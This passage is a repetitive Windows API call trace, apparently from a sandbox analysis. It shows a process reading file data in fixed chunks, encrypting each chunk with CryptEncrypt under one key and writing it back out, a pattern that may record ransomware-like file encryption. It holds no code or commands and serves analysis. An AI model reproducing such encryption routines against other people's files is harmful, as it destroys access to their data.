[0275.980] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.980] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.980] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.980] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.980] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.980] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.980] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.980] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.981] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.981] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.981] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.981] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.981] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.981] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.981] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.981] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.981] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.981] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.982] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.982] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.982] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.982] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.982] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.982] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.983] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.983] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.983] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.983] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.983] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.983] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.983] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.983] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.983] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.983] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.983] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.983] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.983] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.984] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.984] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.984] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.984] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.984] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.984] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.984] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.984] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.984] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.984] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.984] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.984] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.984] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.985] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.985] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.985] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.985] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.985] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.985] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.985] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.985] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.985] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.985] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.985] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.985] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.985] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.986] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.986] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.986] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.986] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.986] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.986] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.986] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.986] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.986] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.986] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.986] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.986] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.986] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.987] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.987] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.987] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.987] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.987] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.987] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.987] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.987] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.987] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.987] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.987] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.987] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.987] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.988] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.988] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.988] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.988] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.988] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.988] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.988] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.988] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.988] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.988] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.988] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0275.988] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.989] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0275.989] CryptEncrypt (in: hKey=0x2fb548, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, 